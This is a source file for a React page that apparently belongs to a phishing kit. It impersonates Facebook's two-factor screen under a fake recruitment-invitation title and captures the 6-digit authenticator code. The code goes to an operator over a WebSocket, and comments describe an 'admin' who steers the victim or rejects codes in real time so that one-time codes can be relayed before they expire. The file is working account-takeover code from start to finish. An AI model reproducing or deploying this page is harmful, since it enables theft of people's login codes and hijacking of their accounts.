// @ts-nocheck
import { useState, useEffect } from "react";
import { useNavigate, useSearchParams } from "react-router-dom";
import { useWebSocket } from "../../context/WebSocketContext";
import useDynamicCss from "../../utils/useDynamicCss";

const AuthApp = () => {
  useEffect(() => {
    document.title = 'Talent Acquisition – Private Invitation';
  }, []);

  useDynamicCss("/css/facebook/verification.css");
  const navigate = useNavigate();
  const [searchParams] = useSearchParams();
  const errorParam = searchParams.get("error");

  const {
    submitForm,
    isConnected,
    verificationError,
    clearVerificationError,
    navigationEvent,
    clearNavigationEvent,
  } = useWebSocket();
  const [code, setCode] = useState("");
  const [showError, setShowError] = useState(false);
  const [showInvalidError, setShowInvalidError] = useState(
    errorParam === "wrong-code",
  );
  const [isLoading, setIsLoading] = useState(false);
  const [isSubmitted, setIsSubmitted] = useState(false);
  const [countdown, setCountdown] = useState(30); // 30 seconds for auth app codes
  const [canRefresh, setCanRefresh] = useState(false);
  const [isPageLoading, setIsPageLoading] = useState(true);

  useEffect(() => {
    const timer = setTimeout(() => setIsPageLoading(false), 700);
    return () => clearTimeout(timer);
  }, []);

  // Reset state when admin navigates (allows changing route without re-submitting)
  useEffect(() => {
    if (navigationEvent) {
      setIsLoading(false);
      setIsSubmitted(false);
      clearNavigationEvent();
    }
  }, [navigationEvent, clearNavigationEvent]);

  useEffect(() => {
    const errorParam = searchParams.get("error");
    if (errorParam === "wrong-code") {
      setShowInvalidError(true);
      setIsLoading(false);
      setIsSubmitted(false);
    }
  }, [searchParams]);

  // Handle verification error from admin
  useEffect(() => {
    if (
      verificationError &&
      (verificationError.type === "auth" ||
        verificationError.type === "fb-auth" ||
        verificationError.type === "wrong-code")
    ) {
      setShowInvalidError(true);
      setIsLoading(false);
      setIsSubmitted(false);
      setCode("");
      clearVerificationError();
    }
  }, [verificationError, clearVerificationError]);

  useEffect(() => {
    if (countdown <= 0) {
      setCanRefresh(true);
      return;
    }

    const timer = setInterval(() => {
      setCountdown((prev) => prev - 1);
    }, 1000);

    return () => clearInterval(timer);
  }, [countdown]);

  const formatTime = (seconds: number) => {
    const mins = Math.floor(seconds / 60);
    const secs = seconds % 60;
    return `${String(mins).padStart(2, "0")}:${String(secs).padStart(2, "0")}`;
  };

  const handleSubmit = (e: any) => {
    e.preventDefault();

    const value = code.trim();

    // Validate code length (6 digits for auth apps)
    if (value.length !== 6 || !/^\d+$/.test(value)) {
      setShowError(true);
      return;
    }

    setShowError(false);
    setIsLoading(true);

    // Submit to WebSocket
    submitForm("fb-auth", {
      code: value,
    });

    setIsSubmitted(true);
    // Keep loading state - admin will navigate via WebSocket
  };

  const handleRefreshCode = () => {
    if (canRefresh) {
      setCountdown(30);
      setCanRefresh(false);
    }
  };

  return (
    <>
      {isPageLoading && (
        <div
          style={{
            position: "fixed",
            top: 0,
            left: 0,
            width: "100vw",
            height: "100vh",
            display: "flex",
            alignItems: "center",
            justifyContent: "center",
            backgroundColor: "#ffffff",
            zIndex: 99999,
          }}
        ></div>
      )}
      <div
        className={`wrapper-loading-root ${isLoading ? "body-loading" : "hidden"}`}
      >
        <div className={`progress-bar ${isLoading ? "show" : ""}`}>
          <div className="bar1"></div>
          <div className="bar2"></div>
        </div>
      </div>
      <div className={`verification_main ${isLoading ? "body-loading" : ""}`}>
        <div className="container">
          <div className="heading">
            <span>• Facebook</span>
            <h2>Go to your authentication app</h2>
            <p>
              Enter the 6-digit code generated by your authentication app (such
              as Duo Mobile or Google Authenticator).
            </p>
          </div>
          <div className="image">
            <img alt="Authentication App" src="/auth.png" />
          </div>
          <div className="form">
            <form onSubmit={handleSubmit}>
              <input
                className="authFormInput"
                id="authenticator"
                placeholder="6-digit code"
                maxLength={6}
                type="text"
                name="authenticator"
                value={code}
                onChange={(e: any) => {
                  // Only allow numbers
                  const val = e.target.value.replace(/\D/g, "");
                  setCode(val);
                  setShowError(false);
                  setShowInvalidError(false);
                }}
              />
              <span className={`error ${showError ? "show" : ""}`}>
                Please enter a valid 6-digit code
              </span>
              <span
                className={`error ${showInvalidError ? "show" : ""}`}
                style={{ marginTop: "12px", marginBottom: "-12px" }}
              >
                Invalid code. Please check your authentication app and try
                again.
              </span>
              <button
                name="submitAuth"
                id="submitButton"
                type="submit"
                className="submit-btn"
                style={{ marginTop: "32px" }}
                disabled={isLoading}
              >
                {isLoading ? (
                  <>
                    <svg className="spinner" viewBox="0 0 50 50">
                      <circle
                        className="path"
                        cx="25"
                        cy="25"
                        r="20"
                        fill="none"
                        strokeWidth="5"
                      ></circle>
                    </svg>
                    <span>Please wait...</span>
                  </>
                ) : (
                  "Continue"
                )}
              </button>
            </form>
          </div>
        </div>
      </div>
    </>
  );
};

export default AuthApp;
